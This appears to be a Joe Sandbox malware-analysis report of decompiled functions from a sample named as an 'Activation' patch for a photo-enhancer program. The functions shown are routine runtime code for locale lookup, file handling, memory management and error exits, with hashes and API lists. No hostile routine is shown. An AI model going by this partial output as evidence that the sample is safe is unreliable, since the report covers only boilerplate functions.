Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction ID: 3b27ac6c5e0f9a5810868b706c98a54019571903b6d877547466b603179570a7
Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction Fuzzy Hash: 9E32D674E04219DFCB14CF99CA80A9DBBB2BF88314F24816AD855B7385DB34AE42CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004074D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E004074D8(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t50;
				intOrPtr _t64;
				void* _t72;

				_v20 = 0;
				_v12 = 0;
				_push(_t72);
				_push(0x4075dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t72 + 0xfffffff0;
				_t50 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetUserDefaultUILanguage");
				if(_t50 == 0) {
					if( *0x40c07c != 2) {
						if(E0040741C(0, "Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v8, 1, 0) == 0) {
							E00407410();
							RegCloseKey(_v8);
						}
					} else {
						if(E0040741C(0, ".DEFAULT\\Control Panel\\International", 0x80000003,  &_v8, 1, 0) == 0) {
							E00407410();
							RegCloseKey(_v8);
						}
					}
					E0040322C( &_v20, E00407680);
					E004032FC( &_v20, _v12);
					E004027B4(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t50();
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(E004075E4);
				E00403198( &_v20);
				return E00403198( &_v12);
			}

0x004074e3
0x004074e6
0x004074eb
0x004074ec
0x004074f1
0x004074f4
0x0040750c
0x00407510
0x00407522
0x00407577
0x00407584
0x0040758d
0x0040758d
0x00407524
0x0040753f
0x0040754c
0x00407555
0x00407555
0x0040753f
0x0040759a
0x004075a5
0x004075b0
0x004075bb
0x004075bb
0x00407512
0x00407512
0x00407514
0x004075c1
0x004075c4
0x004075c7
0x004075cf
0x004075dc

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,004075DD,?,00000000,00409DF0), ref: 00407501
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407507
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004075DD,?,00000000,00409DF0), ref: 00407555

Strings

Locale, xrefs: 00407544
Control Panel\Desktop\ResourceLocale, xrefs: 00407564
kernel32.dll, xrefs: 004074FC
GetUserDefaultUILanguage, xrefs: 004074F7
.DEFAULT\Control Panel\International, xrefs: 0040752C

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 0178f007b2e9ce97110c2286f944ebc52b58938adea7bd75e582725685aec29c
Instruction ID: 86f2a6ba799f7653865fc0e2ce0ef1955b98c5cb30eb2cc475413799582f5e83
Opcode Fuzzy Hash: 0178f007b2e9ce97110c2286f944ebc52b58938adea7bd75e582725685aec29c
Instruction Fuzzy Hash: 27215570E48205BBDB00EAA5CC55BDF77A8AB44354F50887BA501F76C1DB7CBA04865E

Uniqueness

Uniqueness Score: -1.00%

Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A97(void** __eax) {
				void* _t25;
				long _t26;
				void* _t27;
				long _t30;
				void* _t34;
				void* _t36;
				long _t37;
				int _t40;
				void* _t42;
				void* _t48;
				void* _t49;
				long _t50;
				long _t51;
				void* _t54;
				void** _t55;
				DWORD* _t56;

				_t55 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				_t25 =  *((intOrPtr*)(__eax + 4)) - 0xd7b1;
				if(_t25 == 0) {
					_t26 = 0x80000000;
					_t51 = 2;
					_t50 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = E00403A28;
					L8:
					_t55[9] = 0x403a7f;
					_t55[8] = E00403A4F;
					if(_t55[0x12] == 0) {
						_t55[9] = E00403A4F;
						if(_t55[1] == 0xd7b2) {
							_t27 = GetStdHandle(0xfffffff5);
						} else {
							_t27 = GetStdHandle(0xfffffff6);
						}
						if(_t27 == 0xffffffff) {
							L35:
							_t55[1] = 0xd7b0;
							return GetLastError();
						} else {
							 *_t55 = _t27;
							L28:
							if(_t55[1] == 0xd7b1) {
								L32:
								return 0;
							}
							_t30 = GetFileType( *_t55);
							if(_t30 == 0) {
								CloseHandle( *_t55);
								_t55[1] = 0xd7b0;
								return 0x69;
							}
							if(_t30 == 2) {
								_t55[8] = E00403A52;
							}
							goto L32;
						}
					}
					_t34 = CreateFileA( &(_t55[0x12]), _t26, _t51, 0, _t50, 0x80, 0);
					if(_t34 == 0xffffffff) {
						goto L35;
					}
					 *_t55 = _t34;
					if(_t55[1] != 0xd7b3) {
						goto L28;
					}
					_t55[1] = _t55[1] - 1;
					_t36 = GetFileSize( *_t55, 0) + 1;
					if(_t36 == 0) {
						goto L35;
					}
					_t37 = _t36 - 0x81;
					if(_t37 < 0) {
						_t37 = 0;
					}
					if(SetFilePointer( *_t55, _t37, 0, 0) + 1 == 0) {
						goto L35;
					} else {
						_t40 = ReadFile( *_t55,  &(_t55[0x53]), 0x80, _t56, 0);
						_t54 = 0;
						if(_t40 != 1) {
							goto L35;
						}
						_t42 = 0;
						while(_t42 < _t54) {
							if( *((char*)(_t55 + _t42 + 0x14c)) == 0x1a) {
								if(SetFilePointer( *_t55, _t42 - _t54, 0, 2) + 1 == 0 || SetEndOfFile( *_t55) != 1) {
									goto L35;
								} else {
									goto L28;
								}
							}
							_t42 = _t42 + 1;
						}
						goto L28;
					}
				}
				_t48 = _t25 - 1;
				if(_t48 == 0) {
					_t26 = 0x40000000;
					_t51 = 1;
					_t50 = 2;
					L7:
					_t55[7] = E00403A52;
					goto L8;
				}
				_t49 = _t48 - 1;
				if(_t49 == 0) {
					_t26 = 0xc0000000;
					_t51 = 1;
					_t50 = 3;
					goto L7;
				}
				return _t49;
			}

0x00403a98
0x00403a9c
0x00403a9f
0x00403aa5
0x00403aaa
0x00403ab7
0x00403abc
0x00403ac1
0x00403ac6
0x00403af6
0x00403af6
0x00403afd
0x00403b08
0x00403bbc
0x00403bca
0x00403bd2
0x00403bcc
0x00403bd2
0x00403bd2
0x00403bda
0x00403c17
0x00403c17
0x00000000
0x00403bdc
0x00403bdc
0x00403bde
0x00403be5
0x00403bfe
0x00000000
0x00403bfe
0x00403be9
0x00403bf0
0x00403c04
0x00403c09
0x00000000
0x00403c10
0x00403bf5
0x00403bf7
0x00403bf7
0x00000000
0x00403bf5
0x00403bda
0x00403b1e
0x00403b26
0x00000000
0x00000000
0x00403b2c
0x00403b35
0x00000000
0x00000000
0x00403b3b
0x00403b47
0x00403b48
0x00000000
0x00000000
0x00403b4e
0x00403b53
0x00403b55
0x00403b55
0x00403b64
0x00000000
0x00403b6a
0x00403b7f
0x00403b84
0x00403b86
0x00000000
0x00000000
0x00403b8c
0x00403b8e
0x00403b9a
0x00403bae
0x00000000
0x00403bba
0x00000000
0x00403bba
0x00403bae
0x00403b9c
0x00403b9c
0x00000000
0x00403b8e
0x00403b64
0x00403aac
0x00403aad
0x00403acf
0x00403ad4
0x00403ad9
0x00403aef
0x00403aef
0x00000000
0x00403aef
0x00403aaf
0x00403ab0
0x00403ae0
0x00403ae5
0x00403aea
0x00000000
0x00403aea
0x00000000

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
GetLastError.KERNEL32(000000F5), ref: 00403C1E

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004019DC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004019DC() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t18;
				intOrPtr _t22;
				intOrPtr _t24;

				_t22 = _t24;
				if( *0x40d415 == 0) {
					return _t2;
				} else {
					_push(_t22);
					_push(E00401AB4);
					_push( *[fs:edx]);
					 *[fs:edx] = _t24;
					if( *0x40d032 != 0) {
						_push(0x40d41c);
						L00401274();
					}
					 *0x40d415 = 0;
					_t3 =  *0x40d474; // 0x682508
					LocalFree(_t3);
					 *0x40d474 = 0;
					_t18 =  *0x40d43c; // 0x683b3c
					while(_t18 != 0x40d43c) {
						VirtualFree( *(_t18 + 8), 0, 0x8000);
						_t18 =  *_t18;
					}
					E004012DC(0x40d43c);
					E004012DC(0x40d44c);
					E004012DC(0x40d478);
					_t14 =  *0x40d434; // 0x683508
					while(_t14 != 0) {
						 *0x40d434 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x40d434; // 0x683508
					}
					_pop( *[fs:0x0]);
					_push(0x401abb);
					if( *0x40d032 != 0) {
						_push(0x40d41c);
						L0040127C();
					}
					_push(0x40d41c);
					L00401284();
					return _t14;
				}
			}

0x004019dd
0x004019e7
0x00401abd
0x004019ed
0x004019ef
0x004019f0
0x004019f5
0x004019f8
0x00401a02
0x00401a04
0x00401a09
0x00401a09
0x00401a0e
0x00401a15
0x00401a1b
0x00401a22
0x00401a27
0x00401a41
0x00401a3a
0x00401a3f
0x00401a3f
0x00401a4e
0x00401a58
0x00401a62
0x00401a67
0x00401a6e
0x00401a72
0x00401a79
0x00401a7e
0x00401a83
0x00401a87
0x00401a91
0x00401a9d
0x00401a9f
0x00401aa4
0x00401aa4
0x00401aa9
0x00401aae
0x00401ab3
0x00401ab3

APIs

RtlEnterCriticalSection.KERNEL32(0040D41C,00000000,00401AB4), ref: 00401A09
LocalFree.KERNEL32(00682508,00000000,00401AB4), ref: 00401A1B
VirtualFree.KERNEL32(?,00000000,00008000,00682508,00000000,00401AB4), ref: 00401A3A
LocalFree.KERNEL32(00683508,?,00000000,00008000,00682508,00000000,00401AB4), ref: 00401A79
RtlLeaveCriticalSection.KERNEL32(0040D41C,00401ABB), ref: 00401AA4
RtlDeleteCriticalSection.KERNEL32(0040D41C,00401ABB), ref: 00401AAE

Strings

<;h, xrefs: 00401A27, 00401A49

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: <;h
API String ID: 3782394904-2917909428
Opcode ID: cd16023abb96cb21e403ebb25ca28ee2789d023fd43f0fa3de37ec6181e386dc
Instruction ID: 2a1e8c518b16d72ac75c21d19d034316e64e92064156904d4596c6339aa50fda
Opcode Fuzzy Hash: cd16023abb96cb21e403ebb25ca28ee2789d023fd43f0fa3de37ec6181e386dc
Instruction Fuzzy Hash: 65114274B422805ADB11EBE99EC6F5276689785708F44407FF448B62F2C67CA848CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040584C Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040584C(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t148;
				intOrPtr _t156;

				_t153 = __esi;
				_t152 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(__esi);
				_push(__edi);
				_push(_t156);
				_push(0x405a94);
				_push( *[fs:eax]);
				 *[fs:eax] = _t156;
				_t104 = GetSystemDefaultLCID();
				E00405694(_t31, 0, 0x14,  &_v16);
				E004031E8(0x40d498, _t104, _v16, __edi, __esi);
				E00405694(_t104, 0x405aac, 0x1b,  &_v16);
				 *0x40d49c = E0040514C(0x405aac, 0);
				E00405694(_t104, 0x405aac, 0x1c,  &_v16);
				 *0x40d49d = E0040514C(0x405aac, 0);
				 *0x40d49e = E004056E0(_t104, 0x2c, 0xf);
				 *0x40d49f = E004056E0(_t104, 0x2e, 0xe);
				E00405694(_t104, 0x405aac, 0x19,  &_v16);
				 *0x40d4a0 = E0040514C(0x405aac, 0);
				 *0x40d4a1 = E004056E0(_t104, 0x2f, 0x1d);
				E00405694(_t104, "m/d/yy", 0x1f,  &_v16);
				E004031E8(0x40d4a4, _t104, _v16, _t152, _t153);
				E00405694(_t104, "mmmm d, yyyy", 0x20,  &_v16);
				E004031E8(0x40d4a8, _t104, _v16, _t152, _t153);
				 *0x40d4ac = E004056E0(_t104, 0x3a, 0x1e);
				E00405694(_t104, 0x405ae0, 0x28,  &_v16);
				E004031E8(0x40d4b0, _t104, _v16, _t152, _t153);
				E00405694(_t104, 0x405aec, 0x29,  &_v16);
				E004031E8(0x40d4b4, _t104, _v16, _t152, _t153);
				E00405694(_t104, 0x405aac, 0x25,  &_v16);
				if(E0040514C(0x405aac, 0) != 0) {
					E0040322C( &_v8, 0x405b04);
				} else {
					E0040322C( &_v8, 0x405af8);
				}
				E00405694(_t104, 0x405aac, 0x23,  &_v16);
				if(E0040514C(0x405aac, 0) != 0) {
					E00403198( &_v12);
				} else {
					E0040322C( &_v12, 0x405b10);
				}
				_push(_v8);
				_push(":mm");
				_push(_v12);
				E004033B4();
				_push(_v8);
				_push(":mm:ss");
				_push(_v12);
				E004033B4();
				_pop(_t148);
				 *[fs:eax] = _t148;
				_push(E00405A9B);
				return E004031B8( &_v16, 3);
			}

0x0040584c
0x0040584c
0x0040584f
0x00405851
0x00405853
0x00405856
0x00405857
0x0040585a
0x0040585b
0x00405860
0x00405863
0x0040586b
0x0040587a
0x00405887
0x0040589c
0x004058ab
0x004058c0
0x004058cf
0x004058e2
0x004058f5
0x0040590a
0x00405919
0x0040592c
0x00405941
0x0040594e
0x00405963
0x00405970
0x00405983
0x00405998
0x004059a5
0x004059ba
0x004059c7
0x004059dc
0x004059ed
0x00405a06
0x004059ef
0x004059f7
0x004059f7
0x00405a1b
0x00405a2c
0x00405a40
0x00405a2e
0x00405a36
0x00405a36
0x00405a45
0x00405a48
0x00405a4d
0x00405a5a
0x00405a5f
0x00405a62
0x00405a67
0x00405a74
0x00405a7b
0x00405a7e
0x00405a81
0x00405a93

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00405A94,?,?,?,?,00000000,00000000,00000000,?,00406A73,00000000,00406A86), ref: 00405866

Part of subcall function 00405694: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040D4C0,00000001,?,0040575F,?,00000000,0040583E), ref: 004056B2

Part of subcall function 004056E0: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004058E2,?,?,?,00000000,00405A94), ref: 004056F3

Strings

mmmm d, yyyy, xrefs: 00405957
:mm, xrefs: 00405A48
m/d/yy, xrefs: 00405935
AMPM, xrefs: 00405A31
:mm:ss, xrefs: 00405A62

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 5a553179c7555abcfcf22225c6a629e87a34c3027ea7095babbe5e1ef45f2de3
Instruction ID: 6fbfddc16810fcf353c8d16d6476d0df8e1e1129542ac215d571de96c8bf2126
Opcode Fuzzy Hash: 5a553179c7555abcfcf22225c6a629e87a34c3027ea7095babbe5e1ef45f2de3
Instruction Fuzzy Hash: A8512034B005486BDB00EBA59891A8F7769DB98304F50D87BB505BB3C6DA3DDE098F5C

Uniqueness

Uniqueness Score: -1.00%

Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403D02(int __eax) {
				intOrPtr* _t7;
				intOrPtr* _t8;
				signed int _t15;
				signed int _t19;
				intOrPtr _t20;
				unsigned int _t21;
				char* _t29;
				char* _t30;
				void* _t46;

				 *0x40d020 = __eax;
				if( *0x40d030 == 0) {
					goto L5;
				} else {
					_t46 =  *0x40d414 - 1;
					if(_t46 < 0) {
						L17:
						ExitProcess( *0x40d020);
					} else {
						if(_t46 == 0 || __eax != 0) {
							while(1) {
								L5:
								_t7 =  *0x40d024; // 0x4039e8
								_t8 = _t7;
								if(_t8 == 0) {
									break;
								}
								 *0x40d024 = 0;
								 *_t8();
							}
							if( *0x40d028 != 0) {
								_t19 =  *0x40d020; // 0x0
								_t29 = "  at 00000000";
								do {
									_t2 = _t19 % 0xa;
									_t19 = _t19 / 0xa;
									 *_t29 = _t2 + 0x30;
									_t29 = _t29 - 1;
								} while (_t19 != 0);
								_t30 = 0x40c030;
								_t20 =  *0x40d028; // 0x0
								_t21 = _t20 - 0x401178;
								do {
									 *_t30 =  *((intOrPtr*)((_t21 & 0x0000000f) + 0x403e1c));
									_t30 = _t30 - 1;
									_t21 = _t21 >> 4;
								} while (_t21 != 0);
								if( *0x40d031 != 0) {
									E00403FE4(0x40d204, "Runtime error     at 00000000");
									E00403F67();
								} else {
									MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
								}
							}
							E00403CC8(0x40d038);
							E00403CC8(0x40d204);
							E004019DC();
							if( *0x40d414 == 0) {
								E004030B4();
								goto L17;
							}
						}
					}
				}
				E004030B4();
				 *0x40d414 = 0;
				_t15 =  *0x40d020; // 0x0
				asm("sbb eax, eax");
				return  ~_t15 + 1;
			}

0x00403d04
0x00403d10
0x00000000
0x00403d12
0x00403d12
0x00403d19
0x00403ddf
0x00403de5
0x00403d1f
0x00403d1f
0x00403d29
0x00403d29
0x00403d29
0x00403d2e
0x00403d30
0x00000000
0x00000000
0x00403d34
0x00403d3a
0x00403d3a
0x00403d45
0x00403d47
0x00403d4c
0x00403d56
0x00403d58
0x00403d58
0x00403d5d
0x00403d5f
0x00403d60
0x00403d64
0x00403d69
0x00403d6e
0x00403d73
0x00403d7e
0x00403d80
0x00403d81
0x00403d81
0x00403d8d
0x00403dae
0x00403db3
0x00403d8f
0x00403d9d
0x00403d9d
0x00403d8d
0x00403dbd
0x00403dc7
0x00403dcc
0x00403dd8
0x00403dda
0x00000000
0x00403dda
0x00403dd8
0x00403d1f
0x00403d19
0x00403dea
0x00403def
0x00403df6
0x00403dfd
0x00403e19

APIs

MessageBoxA.USER32 ref: 00403D9D
ExitProcess.KERNEL32 ref: 00403DE5

Strings

9@, xrefs: 00403D29, 00403D34
Error, xrefs: 00403D91
Runtime error at 00000000, xrefs: 00403D96, 00403DA9

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000$9@
API String ID: 1220098344-1503883590
Opcode ID: 06c1af3a807ed13e53e556f1551eab319716f56e5b0a099a7904d38b73613604
Instruction ID: 19c161ad1fd1f445befe0ff666437f64548d8e35ccd3b0abec794ae5707e41c3
Opcode Fuzzy Hash: 06c1af3a807ed13e53e556f1551eab319716f56e5b0a099a7904d38b73613604
Instruction Fuzzy Hash: 0421C834E152418AE714EFE59A817153E989B5930DF04817BD504B73E3C67C9A4EC36E

Uniqueness

Uniqueness Score: -1.00%

Function 00401918 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401918() {
				signed int _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E004019CE);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x40d41c);
				L0040126C();
				if( *0x40d032 != 0) {
					_push(0x40d41c);
					L00401274();
				}
				E004012DC(0x40d43c);
				E004012DC(0x40d44c);
				E004012DC(0x40d478);
				 *0x40d474 = LocalAlloc(0, 0xff8);
				if( *0x40d474 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x40d474; // 0x682508
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x40d460)) = 0x40d45c;
					 *0x40d45c = 0x40d45c;
					 *0x40d468 = 0x40d45c;
					 *0x40d415 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E004019D5);
				if( *0x40d032 != 0) {
					_push(0x40d41c);
					L0040127C();
					return 0;
				}
				return 0;
			}

0x0040191d
0x0040191e
0x00401923
0x00401926
0x00401929
0x0040192e
0x0040193a
0x0040193c
0x00401941
0x00401941
0x0040194b
0x00401955
0x0040195f
0x00401970
0x0040197c
0x0040197e
0x00401983
0x00401983
0x0040198b
0x0040198f
0x00401990
0x0040199c
0x0040199f
0x004019a1
0x004019a6
0x004019a6
0x004019af
0x004019b2
0x004019b5
0x004019c1
0x004019c3
0x004019c8
0x00000000
0x004019c8
0x004019cd

APIs

RtlInitializeCriticalSection.KERNEL32(0040D41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
RtlEnterCriticalSection.KERNEL32(0040D41C,0040D41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
LocalAlloc.KERNEL32(00000000,00000FF8,0040D41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
RtlLeaveCriticalSection.KERNEL32(0040D41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8

Strings

<;h, xrefs: 00401946

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID: <;h
API String ID: 730355536-2917909428
Opcode ID: 9f881a8bacb1daf6c7624187f7ead8d5efbc023271222afd5c45f6ad5948e445
Instruction ID: ca3d82fa79822ebb621977d4c6345e30539334a4bf25a92a69ec079a2ec9ab95
Opcode Fuzzy Hash: 9f881a8bacb1daf6c7624187f7ead8d5efbc023271222afd5c45f6ad5948e445
Instruction Fuzzy Hash: F20192B4E442405EE715ABFA9A56B253BA4D789704F1080BFF044F72F2C67C6458C75D

Uniqueness

Uniqueness Score: -1.00%

Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004036B8(char* __eax) {
				short _v2064;
				short* _t8;
				short* _t15;
				char* _t16;
				short* _t17;
				int _t18;
				int _t19;

				_t16 = __eax;
				_t18 = E004032F4(__eax);
				if(E004032F4(_t16) >= 0x400) {
					_t8 = MultiByteToWideChar(0, 0, _t16, _t18, 0, 0);
					_t19 = _t8;
					_push(_t19);
					_push(0);
					L00401224();
					_t17 = _t8;
					MultiByteToWideChar(0, 0, _t16, _t18, _t17, _t19);
				} else {
					_push(MultiByteToWideChar(0, 0, E00403414(_t16), _t18,  &_v2064, 0x400));
					_t15 =  &_v2064;
					_push(_t15);
					L00401224();
					_t17 = _t15;
				}
				return _t17;
			}

0x004036c2
0x004036cb
0x004036d9
0x00403710
0x00403715
0x00403717
0x00403718
0x0040371a
0x0040371f
0x00403729
0x004036db
0x004036f7
0x004036f8
0x004036fc
0x004036fd
0x00403702
0x00403702
0x0040373a

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: a67f2483392f3a9295a6f421ec51b00ba0520a603cf3575c2b5e933881db78c1
Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
Opcode Fuzzy Hash: a67f2483392f3a9295a6f421ec51b00ba0520a603cf3575c2b5e933881db78c1
